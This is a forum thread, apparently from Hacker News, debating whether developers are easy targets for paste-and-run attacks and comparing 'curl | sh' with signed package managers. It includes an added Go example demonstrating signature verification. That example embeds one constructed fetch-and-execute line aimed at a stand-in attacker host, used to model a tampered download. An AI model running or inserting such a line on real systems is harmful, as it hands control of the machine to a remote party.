Comment by drexlspivey 10 months ago

14 replies

If your method of infecting your victim is having them paste and run a random command in their terminal, software developers are probably the worst group of people to be targeting.

thephyber 10 months ago

“Curl pipe sh” would like to have a word…

I think you are painting with a broad brush.

  • vultour 10 months ago

    This is no different from installing a random package through a package manager. If you're running "curl pipe sh" because an email told you to, that's on you.

    • craftkiller 10 months ago

      No it isn't. Package managers verify the cryptographically signed package. That means the package can be built on a secure server, and then if a mirror becomes malicious or gets compromised, the malicious package won't have a valid signature so the package will not be installed. Running curl and piping it into sh means that not only could a malicious mirror or compromised server execute anything they want on your computer, but they could even send a different script when you curl it into sh vs when you view it any other way, making it much harder to detect[0].

      [0] https://web.archive.org/web/20240213030202/https://www.idont...
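The signed-distribution model craftkiller describes, worked through as an added example that is not part of this thread or of the linked article. It uses Go's standard-library Ed25519 (my choice; the comment names no particular scheme), and the package name, version, script bytes and the attacker's payload are all constructed for the demo. Besides the two cases in the comment (honest mirror accepted, tampered archive rejected) it also checks one the comment does not spell out: a mirror that re-signs the tampered archive with a key of its own is rejected as well, because the client pins the publisher's key instead of trusting whatever key the mirror serves.

```go
package main

import (
	"bytes"
	"crypto/ed25519"
	"crypto/rand"
	"errors"
	"fmt"
)

// Package is what a mirror hands to a client: the archive bytes plus a
// detached signature produced on the publisher's build server.
type Package struct {
	Name, Version string
	Archive       []byte
	Signature     []byte
}

// Publisher owns the signing key, which never leaves the build server.
type Publisher struct{ priv ed25519.PrivateKey }

// Mirror is a plain byte store. It may be honest or compromised; the client
// must not need to trust it.
type Mirror struct{ store map[string]Package }

var ErrBadSignature = errors.New("signature does not verify against the pinned publisher key")

// signedMessage binds name and version to the archive so a mirror cannot
// replay a correctly signed old release under a newer version string.
func signedMessage(p Package) []byte {
	return []byte(p.Name + "\x00" + p.Version + "\x00" + string(p.Archive))
}

func NewPublisher() (*Publisher, ed25519.PublicKey, error) {
	pub, priv, err := ed25519.GenerateKey(rand.Reader)
	if err != nil {
		return nil, nil, err
	}
	return &Publisher{priv: priv}, pub, nil
}

// Build signs an archive; this is the only place a valid signature can come from.
func (pb *Publisher) Build(name, version string, archive []byte) Package {
	p := Package{Name: name, Version: version, Archive: archive}
	p.Signature = ed25519.Sign(pb.priv, signedMessage(p))
	return p
}

func NewMirror() *Mirror                            { return &Mirror{store: map[string]Package{}} }
func (m *Mirror) Publish(p Package)                 { m.store[p.Name] = p }
func (m *Mirror) Fetch(name string) (Package, bool) { p, ok := m.store[name]; return p, ok }

// Install is the package-manager path: fetch from any mirror, verify against
// the key pinned on the client, and only then hand the archive over for use.
func Install(m *Mirror, pinned ed25519.PublicKey, name string) ([]byte, error) {
	p, ok := m.Fetch(name)
	if !ok {
		return nil, fmt.Errorf("package %q not on mirror", name)
	}
	if !ed25519.Verify(pinned, signedMessage(p), p.Signature) {
		return nil, ErrBadSignature
	}
	return p.Archive, nil
}

// CurlPipeSh is the contrast: whatever bytes the server returns get run.
func CurlPipeSh(m *Mirror, name string) ([]byte, error) {
	p, ok := m.Fetch(name)
	if !ok {
		return nil, fmt.Errorf("script %q not on server", name)
	}
	return p.Archive, nil
}

// Outcome records which of the scenarios below accepted the download.
type Outcome struct {
	HonestAccepted, TamperedRejected, ResignedRejected, CurlRunsTampered bool
}

// Scenario walks through the cases from the thread with constructed data.
func Scenario() (Outcome, error) {
	var o Outcome
	publisher, pinned, err := NewPublisher()
	if err != nil {
		return o, err
	}
	legit := publisher.Build("tool", "1.2.3", []byte("#!/bin/sh\necho installing tool\n"))

	// 1. Honest mirror: signature verifies, archive is accepted unchanged.
	honest := NewMirror()
	honest.Publish(legit)
	got, err := Install(honest, pinned, "tool")
	o.HonestAccepted = err == nil && bytes.Equal(got, legit.Archive)

	// 2. Compromised mirror swaps the archive but keeps the real signature.
	tampered := legit
	tampered.Archive = []byte("#!/bin/sh\ncurl -s http://attacker.invalid/x | sh\n") // constructed payload
	evil := NewMirror()
	evil.Publish(tampered)
	_, err = Install(evil, pinned, "tool")
	o.TamperedRejected = errors.Is(err, ErrBadSignature)

	// 3. Compromised mirror re-signs with its own key: the client only trusts
	//    the pinned publisher key, not a key served by the mirror, so this fails too.
	rogue, _, err := NewPublisher()
	if err != nil {
		return o, err
	}
	resigned := NewMirror()
	resigned.Publish(rogue.Build("tool", "1.2.3", tampered.Archive))
	_, err = Install(resigned, pinned, "tool")
	o.ResignedRejected = errors.Is(err, ErrBadSignature)

	// 4. curl | sh against the same compromised mirror: nothing is checked.
	got, err = CurlPipeSh(evil, "tool")
	o.CurlRunsTampered = err == nil && bytes.Equal(got, tampered.Archive)
	return o, nil
}

func main() {
	o, err := Scenario()
	if err != nil {
		panic(err)
	}
	fmt.Printf("%+v\n", o)
}
```

This is the minimal shape of the argument, not a real package manager: apt, dnf and friends sign repository metadata and check each archive's hash against it, and the trusted keys ship in the distribution's keyring rather than being fetched from the mirror. The practical takeaway for the `curl | sh` side is the same as Install above: save the script to a file, verify it against a checksum or signature obtained out of band, and only then run it.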

      • dylan604 10 months ago

        I think the npm repos would like to have a word with you. Sure glad we've never had a cryptographically signed malicious package delivered via npm install

      • _hyn3 10 months ago

        The tremendous number of attacks delivered via trusted package repos versus the number of widespread attacks via curl | sh (probably roughly zero) means that, theories aside, one of these is far more commonly abused than the other.

    • thephyber 10 months ago

      Both are examples of developer-types doing risky things, which was my point and also supports my point that developers are not exclusively better secured than non-developer types.

TheRealPomax 10 months ago

You just need a handful of people to fall for it, and a population of a hundred million daily active users on GitHub means there are always a handful of people to trick.

arccy 10 months ago

you'd be surprised at the quality of the average dev

lukan 10 months ago

My only encounter with this is that I am annoyed if I open web dev tools on a new browser profile/guest profile but am interrupted in my workflow because first I have to type "allow pasting" every single time. (Why do I do this quite often? To be sure to have a clean state when debugging a web app.) And all this because some people cannot think before they follow obscure instructions sent to them by an untrusted party?

Why can't we have nice things again? Because of abusers yes, but also because of sheep people.

jeroenhd 10 months ago

Hard disagree. Developers aren't magically tech wizards, many of them will struggle to install a printer. I've seen one spend fifteen minutes on adding a keyboard layout in Windows last week (granted, the process was very unintuitive).

It's this "I'm a developer, I'm too smart to fall for phishing" mindset that makes developers an excellent target for malware.